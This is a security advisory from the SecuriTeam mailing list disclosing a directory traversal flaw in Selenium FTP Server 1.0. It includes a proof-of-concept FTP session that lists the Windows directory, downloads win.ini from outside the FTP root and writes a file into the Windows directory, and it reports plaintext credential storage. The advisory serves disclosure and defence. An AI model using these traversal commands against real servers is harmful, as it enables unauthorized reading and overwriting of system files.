SecurityvulnsSECURITYVULNS:DOC:15094[NT] Selenium FTP Server Directory Traversal
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
-
- promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
Selenium FTP Server Directory Traversal
SUMMARY
<http://bibasoftware.com/?page_id=15> Selenium FTP Server is vulnerable
to a directory transversal input validation error in which a remote
unauthenticated user can issue using the DIR, LIST, NLST, etc commands to
display any file on the remote server or use the GET/RECV command to
retrieve any file outside the FTP root and the PUT/SEND to write to any
location on the remote server.
DETAILS
Vulnerable Systems:
- Selenium FTP Server version 1.0
Proof of concept:
C:\LinaresExploits\>ftp localhost
Connected to GregL-WS.
220 Selenium Server FTP (http://bibasoftware.com)
User (GregL-WS:(none)):
331 Password required for .
Password:
230 User logged in.
ftp> dir \windows
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Nov 14 15:53 WINDOWS
226 File sent ok
ftp: 63 bytes received in 0.02Seconds 3.94Kbytes/sec.
ftp> dir \windows\*.exe
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 68096 May 02 2005 agrsmdel.exe
-rwxrwxrwx 1 ftp ftp 44544 Jun 02 1998 clspack.exe
-rwxrwxrwx 1 ftp ftp 1032192 Aug 04 2004 explorer.exe
-rwxrwxrwx 1 ftp ftp 10752 May 26 2005 hh.exe
-rwxrwxrwx 1 ftp ftp 306688 Oct 29 1998 IsUninst.exe
-rwxrwxrwx 1 ftp ftp 112640 Jul 01 2001 lsb_un20.exe
-rwxrwxrwx 1 ftp ftp 69120 Aug 04 2004 notepad.exe
-rwxrwxrwx 1 ftp ftp 69120 Aug 04 2004 notepad1.exe
-rwxrwxrwx 1 ftp ftp 146432 Aug 04 2004 regedit.exe
-rwxrwxrwx 1 ftp ftp 46352 Feb 28 2003 setdebug.exe
-rwxrwxrwx 1 ftp ftp 286720 Sep 07 14:10 Setup1.exe
-rwxrwxrwx 1 ftp ftp 32866 Aug 04 2004 slrundll.exe
-rwxrwxrwx 1 ftp ftp 46592 Aug 02 2002 SOUNDMAN.EXE
-rwxrwxrwx 1 ftp ftp 73216 Sep 07 14:10 ST6UNST.EXE
-rwxrwxrwx 1 ftp ftp 15360 Aug 04 2004 taskman.exe
-rwxrwxrwx 1 ftp ftp 90624 Oct 27 13:22 tsuninst1.exe
-rwxrwxrwx 1 ftp ftp 49680 Aug 04 2004 twunk_16.exe
-rwxrwxrwx 1 ftp ftp 25600 Aug 04 2004 twunk_32.exe
-rwxrwxrwx 1 ftp ftp 299520 Mar 23 1999 uninst.exe
-rwxrwxrwx 1 ftp ftp 107134 Apr 04 08:06 UninstallFirefox.exe
-rwxrwxrwx 1 ftp ftp 86016 Dec 17 1999 unvise32.exe
-rwxrwxrwx 1 ftp ftp 256192 Aug 04 2004 winhelp.exe
-rwxrwxrwx 1 ftp ftp 283648 Aug 04 2004 winhlp32.exe
226 File sent ok
ftp: 1557 bytes received in 0.03Seconds 50.23Kbytes/sec.
ftp> get …\windows\win.ini C:\mine.txt
200 Port command successful.
150 Opening data connection for …\windows\win.ini.
226 File sent ok
ftp: 1039 bytes received in 0.00Seconds 1039000.00Kbytes/sec.
ftp> put C:\mine.txt …\windows\toobad.txt
200 Port command successful.
150 Opening data connection for …\windows\toobad.txt.
226 File received ok
ftp: 1039 bytes sent in 0.00Seconds 1039000.00Kbytes/sec.
Furthermore the software improperly writes any username/password that
might be used to login to the program in plaintext to the file[s] stored
in the default directory of C:\Program Files\BiBa SOFTWARE\Selenium
Server\Servers
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]>
Greg Linares.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.